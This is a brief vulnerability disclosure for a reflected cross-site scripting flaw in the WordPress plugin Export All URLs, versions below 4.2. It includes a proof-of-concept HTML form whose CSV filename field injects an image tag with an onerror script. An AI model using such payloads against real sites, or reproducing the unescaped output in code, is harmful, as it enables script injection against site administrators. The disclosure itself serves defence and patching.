During a security research I found an reflected XSS vulnerability. The name of the plugin is: Export All URLs, the version of the affected plugin: < 4.2

Description

The plugin does not sanitise and escape the CSV filename 
before outputting it back in the page, leading to a Reflected Cross-Site Scripting.

POC

<html>
  <body>
    <form action="https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" method="POST">
      <input type="hidden" name="post-type" value="any" />
      <input type="hidden" name="additional-data[]" value="title" />
      <input type="hidden" name="post-status" value="publish" />
      <input type="hidden" name="posts-from" value="" />
      <input type="hidden" name="posts-upto" value="" />
      <input type="hidden" name="post-author" value="all" />
      <input type="hidden" name="number-of-posts" value="all" />
      <input type="hidden" name="starting-point" value="" />
      <input type="hidden" name="ending-point" value="" />
      <input type="hidden" name="csv-file-name" value="'><img src onerror=alert(`XSS`)>" />
      <input type="hidden" name="export-type" value="text" />
      <input type="hidden" name="export" value="Export Now" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Additional information

WPSCAN link: https://wpscan.com/vulnerability/e5d95261-a243-493f-be6a-3c15ccb65435

NIST CVSS SCORE: 6.1

NIST LINK: https://nvd.nist.gov/vuln/detail/CVE-2022-0892

Plugin has more than 30,000+ active installations.